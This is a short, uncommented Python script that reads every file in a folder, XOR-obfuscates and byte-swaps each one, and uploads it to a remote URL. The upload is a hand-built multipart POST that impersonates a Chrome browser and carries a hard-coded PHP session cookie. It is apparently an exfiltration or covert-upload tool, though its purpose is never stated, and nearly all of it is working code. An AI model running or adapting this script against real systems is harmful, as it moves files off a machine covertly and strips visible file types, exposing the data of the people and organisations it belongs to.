import os
import requests
import binascii
def enc(file):
    key = file[:4]
    enc = bytearray()
    for i in range(4, len(file)):
    	enc.append(file[i] ^ key[(i-4) % len(key)])
    return enc
    
def swap(bytearray_):
    if len(bytearray_) < 2:
        return bytearray_

    result = []
    for i in range(0, len(bytearray_) - 1, 2):
        result.extend([bytearray_[i+1], bytearray_[i]])
    if len(bytearray_) % 2 == 1:
        result.append(bytearray_[-1])
    return bytearray(result)

for filename in os.listdir(folder_path):
    file_path = os.path.join(folder_path, filename)
    with open(file_path, 'rb') as f:
        file_content = f.read()
    encrypted = swap(enc(file_content))
    headers = {
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary4BIlFVC7HcRhJCay',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36',
        'Cookie': 'PHPSESSID=a2kttlfv0k65t5g1c0s32lpit8',
    }
    data = (
        '------WebKitFormBoundary4BIlFVC7HcRhJCay\r\n'
        f'Content-Disposition: form-data; name="file"; filename="{filename.rsplit(".", 1)[0]}"\r\n'
        'Content-Type: =----=\r\n\r\n'
        f'{encrypted.decode("latin-1")}\r\n'
        '------WebKitFormBoundary4BIlFVC7HcRhJCay\r\n'
        'Content-Disposition: form-data; name="upload_submit"\r\n\r\n'
        'Submit\r\n'
        '------WebKitFormBoundary4BIlFVC7HcRhJCay--\r\n'
    )
    response = requests.post(url, headers=headers, data=data)
